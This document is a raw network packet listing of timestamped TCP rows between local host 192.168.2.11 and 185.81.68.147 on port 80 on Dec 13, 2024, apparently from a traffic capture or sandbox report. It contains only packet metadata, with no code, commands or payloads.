                                                                                                                                                                                                Dec 13, 2024 08:18:54.010833979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.011369944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.011425018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.011464119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.058749914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142070055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142209053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142293930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142466068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142580986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.142662048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.143680096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.143884897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.143961906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.144912958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.145011902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.145085096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.146095991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.146318913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.146392107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.147289991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.147396088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.147475958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.148468018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.148582935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.148650885 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.149641037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.149789095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.149856091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.150835037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.150947094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.151015043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.152010918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.152126074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.152201891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.153254032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.153366089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.153441906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.154421091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.154496908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.154536963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.155702114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.155798912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.155865908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.156887054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.156980991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.157058001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.158030987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.158255100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.158318996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.159190893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.159296989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.159405947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.160358906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.160481930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.160552025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.161556959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.161653996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.161729097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.162754059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.162872076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.162944078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.163950920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.164047003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.164113045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.165201902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.165286064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.165363073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.166326046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.166389942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.166486025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.167526007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.167656898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.167726040 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.168735981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.168850899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.168917894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.169910908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.170027018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.170093060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.171113014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.171228886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.171302080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.172328949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.172480106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.172552109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.173512936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.173615932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.173686981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.174752951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.174853086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.174922943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.175905943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.176027060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.176098108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.177105904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.177156925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.177228928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.178270102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.178473949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.178548098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.179471016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.179795980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.179868937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.180692911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.180797100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.180867910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.181855917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.181972980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.182044029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.183103085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.183213949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.183281898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.184262037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.184385061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.184452057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.185461998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.185611010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.185682058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.186644077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.186794043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.186878920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.187896967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.187952042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.188025951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.189089060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.189131021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.189202070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.190211058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.190304995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.190372944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.191426039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.191617966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.191692114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.192656040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.192723989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.192789078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.193799973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.193897009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.193963051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.195020914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.195199966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.195266962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.196180105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.196229935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.196302891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.197377920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.197508097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.197573900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.198582888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.198677063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.198746920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.199768066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.199886084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.199955940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.200944901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.201078892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.201142073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.284009933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.324400902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.636095047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.636715889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.221474886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.221493006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.221625090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222079039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222126007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222204924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222839117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222877979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.222923994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.224064112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.224283934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.224376917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.225285053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.225354910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.225403070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.226449966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.226505995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.226556063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.227716923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.227780104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.228641987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.228840113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.228931904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.228970051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.230027914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.230175972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.230227947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.231221914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.231328964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.231384993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.232433081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.232464075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.232579947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.233616114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.233756065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.233870983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.234810114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.234886885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.234960079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.235997915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.236059904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.236150980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.237183094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.237242937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.237437963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.238389015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.238491058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.238636971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.239587069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.239650965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.239783049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.240767956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.240860939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.240931034 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.241945982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.242044926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.242113113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.243200064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.243335009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.243411064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.244347095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.244532108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.244605064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.245578051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.245636940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.245718956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.246763945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.246809006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.246885061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.247955084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.248039961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.248156071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.249121904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.249213934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.249293089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.250339985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.250507116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.250592947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.251585007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.251626968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.251832962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.252722979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.252814054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.252882004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.253890038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.253969908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.254040003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.255105019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.255203962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.255295038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.256347895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.256470919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.256671906 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.257545948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.257586956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.257668972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.258686066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.258793116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.258900881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.259903908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.259983063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.260077000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.261096001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.261209965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.261326075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.262301922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.262347937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.262531042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.263492107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.263595104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.263750076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.264652967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.264780998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.264925003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.265871048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.265960932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.266025066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.267072916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.267170906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.267235994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.268265009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.268356085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.268474102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.269440889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.269556046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.269874096 CET4972680192.168.2.11185.81.68.147
